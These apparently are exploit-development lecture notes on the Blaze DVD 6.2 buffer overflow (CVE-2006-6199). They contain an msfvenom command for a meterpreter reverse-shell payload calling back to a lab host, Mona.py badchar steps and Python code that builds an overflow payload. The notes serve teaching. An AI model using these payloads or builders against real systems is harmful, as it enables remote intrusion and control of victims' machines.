Slide 8
§ FastCall
− The first two arguments are passed in ECX and EDX (left to right).
− Any remaining arguments are pushed on the stack (right to left).
§ Cdecl
− Arguments are pushed on the stack (right to left).
− The default convention for C and C++ code.
− EAX, ECX and EDX are caller-saved; the other general-purpose registers are callee-saved.
− The caller removes the arguments from the stack after the call returns (this is what lets variadic functions such as printf work, since only the caller knows how many arguments it pushed).
§ StdCall
− Arguments are pushed on the stack (right to left).
− The callee is responsible for cleaning up the stack (it returns with RET imm16, popping its own arguments).
− Used by the Win32 API.
Slide 9
Stack layout while Main is inside CopyData (diagram from the slide, higher addresses at the top; P2 is the 16-byte buffer that gets overflowed):

High Address
  Main stack frame
    Main parameters
    Saved EIP
    Saved EBP
    Modified (4 bytes)
    P2 (16 bytes)
  CopyData stack frame
    source (4 bytes)
    dest (4 bytes)
    Saved EIP
    Saved EBP        <- EBP, ESP
Low Address
Slide 13
Blaze DVD 6.2 (Latest version)
http://www.blazevideo.com/dvd-player/
CVE-2006-6199
File-format vulnerability: a stack-based buffer overflow that leads to remote code execution when a crafted file is opened.
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6199
Slide 20
Generating the shellcode with msfvenom, excluding the badchars \x00, \x0a and \x1a and emitting it as a Perl string (the output path contains spaces, so it has to be quoted; ~ does not expand inside quotes, hence $HOME):
./msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=172.16.192.1 LPORT=4444 -b '\x00\x0a\x1a' -f perl -o "$HOME/Exploiting/Blaze DVD Example/shellcode_perl.pl"
Slide 21
Badchars: every byte value that the vulnerable program does not carry into memory intact (it truncates on it, drops it or transforms it) and that would therefore break the shellcode.
With Mona.py:
1. Generate an array of all 256 byte values, minus the ones already known to be bad (\x00 almost always is for a string-based overflow):
   !mona bytearray -b '\x00'
2. Run the exploit with that array in place of the shellcode.
3. Compare what landed in memory with the bytearray.bin that step 1 wrote:
   !mona compare -f "C:\Documents and Settings\test\Escritorio\Mona_results\bytearray.bin"
   Only the first differing byte is trustworthy: a byte that truncates or shifts the copy corrupts everything after it. Add that byte to -b, regenerate the array and repeat until the whole array is reported unmodified.
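The bytearray/compare loop above, as an added example that is not part of the slides and not mona.py's own code: it builds the array, diffs it against what the target wrote, reports the first mangled byte and repeats until the array round-trips intact. The target is a constructed stand-in (simulated_target) whose behaviour is assumed for the example; it is not how Blaze DVD handles input.

```python
# Added example (not from the slides or from mona.py): an offline model of the
# badchar loop that "!mona bytearray" and "!mona compare" automate in the
# debugger. The target is a constructed stand-in for the vulnerable program.

def make_bytearray(exclude: bytes = b"\x00") -> bytes:
    """All 256 byte values in ascending order, minus the known bad ones."""
    return bytes(b for b in range(256) if b not in exclude)


def first_badchar(sent: bytes, dumped: bytes):
    """Return the first byte of `sent` that did not reach memory intact, or None.

    Only the first difference is meaningful: a byte that truncates or shifts
    the copy corrupts everything after it, so the array must be regenerated
    without that byte and the test repeated.
    """
    for i, b in enumerate(sent):
        if i >= len(dumped) or dumped[i] != b:
            return b
    return None


def discover_badchars(target, known: bytes = b"\x00") -> bytes:
    """Iterate bytearray -> run -> compare until the array round-trips intact."""
    bad = bytearray(known)
    while True:
        arr = make_bytearray(bytes(bad))
        culprit = first_badchar(arr, target(arr))
        if culprit is None:
            return bytes(sorted(bad))
        bad.append(culprit)


def simulated_target(payload: bytes) -> bytes:
    """Constructed stand-in for the vulnerable program's input handling.

    Assumed behaviour for the example only: the copy stops at a NUL
    (strcpy-style) and at a newline (line-based parsing), and 0x1A is
    silently dropped (treated as a text-mode end-of-file marker).
    """
    out = bytearray()
    for b in payload:
        if b in (0x00, 0x0A):
            break
        if b == 0x1A:
            continue
        out.append(b)
    return bytes(out)


if __name__ == "__main__":
    found = discover_badchars(simulated_target)
    as_escapes = "".join(f"\\x{b:02x}" for b in found)
    print("badchars found:", as_escapes)
    print("msfvenom -b", repr(as_escapes))
```

Against the simulated target the loop takes three rounds: the first run stops at 0x0a, the second (with 0x0a excluded) shows 0x1b where 0x1a was expected, and the third comes back intact, giving exactly the -b list used on slide 20.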
Slide 22
Separating ESP from the shellcode.
If the stack pointer ends up inside (or right at) the shellcode, anything the shellcode itself pushes, such as the decoder stub of an encoded payload, overwrites its own bytes. A short stub moves ESP away first:
• SUB ESP,0x14 (20 bytes) = \x83\xec\x14 (checked with Radare)
The slide writes the operand as decimal 20; the encoded immediate is 0x14. \x83\xec\x20 would be SUB ESP,0x20, i.e. 32 bytes.

Layout from the slide's diagram (higher addresses at the top):
High Address
  Shellcode
  Trash_2
  EIP
  Trash_1          <- ESP - 20 marked here, below the shellcode
Low Address
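The frame arithmetic of slide 9 and the ESP-adjusting stub of slide 22 in one payload builder, as an added example that is not the slides' code: the EIP offset is summed from the fields the diagram places between P2 and the saved EIP, the `sub esp, N` stub is encoded with the 8-bit or 32-bit immediate form as the gap requires, and the finished trash_1 | EIP | trash_2 | shellcode layout is checked against the badchars from slide 20. The return address, the INT3 placeholder shellcode and the NOP filler in trash_2 are assumptions for the example.

```python
import struct

# Added example, not code from the slides: encode the "sub esp, N" stub
# correctly and place it in a trash_1 | EIP | trash_2 | shellcode payload
# whose EIP offset is derived from the frame layout of slide 9.

# Frame contents between the overflowed buffer and the saved EIP (slide 9).
FRAME_BELOW_SAVED_EIP = [("P2", 16), ("Modified", 4), ("Saved EBP", 4)]

BADCHARS = b"\x00\x0a\x1a"   # the bytes excluded with msfvenom -b on slide 20


def eip_offset(frame=FRAME_BELOW_SAVED_EIP) -> int:
    """Bytes written before the saved EIP is reached (length of trash_1)."""
    return sum(size for _, size in frame)


def encode_sub_esp(n: int) -> bytes:
    r"""Machine code for 32-bit `sub esp, n`.

    83 /5 ib carries a sign-extended 8-bit immediate, so it is only valid for
    1..0x7F: \x83\xec\x80 would be sub esp,-0x80, i.e. add esp,0x80.
    Larger gaps need the 32-bit-immediate form 81 /5 id.
    """
    if not 0 < n < 2**31:
        raise ValueError("immediate must be a positive 32-bit value")
    if n <= 0x7F:
        return b"\x83\xec" + struct.pack("<B", n)
    return b"\x81\xec" + struct.pack("<I", n)


def build_payload(ret_addr: int, shellcode: bytes, esp_gap: int = 20,
                  nops: int = 16, frame=FRAME_BELOW_SAVED_EIP) -> bytes:
    """trash_1 | EIP | trash_2 | shellcode, the layout of slide 22.

    trash_2 opens with the sub esp stub so that, once execution reaches it,
    ESP is moved `esp_gap` bytes away from the shellcode and the shellcode's
    own stack writes (decoder stub, pushes) cannot land on its bytes.
    The NOP filler after the stub is an assumption of this example.
    """
    trash_1 = b"A" * eip_offset(frame)
    trash_2 = encode_sub_esp(esp_gap) + b"\x90" * nops
    payload = trash_1 + struct.pack("<I", ret_addr) + trash_2 + shellcode
    # msfvenom already filtered the shellcode; the return address and the stub
    # are our own bytes and must be checked against the same badchar list.
    clashes = [i for i, b in enumerate(payload) if b in BADCHARS]
    if clashes:
        raise ValueError(f"badchars at payload offsets {clashes}")
    return payload


if __name__ == "__main__":
    # Placeholders chosen for the example only, not addresses from the target.
    demo_ret = 0x41424344
    demo_shellcode = b"\xcc" * 8           # INT3s standing in for real shellcode
    p = build_payload(demo_ret, demo_shellcode)
    print(f"EIP offset {eip_offset()}; sub esp,20 -> {encode_sub_esp(20).hex()}")
    print(f"payload ({len(p)} bytes): {p.hex()}")
```

The badchar check is what catches a return address such as 0x00414243: its NUL byte would truncate a string-based overflow before the shellcode is ever copied, so the builder refuses it instead of producing a payload that silently fails.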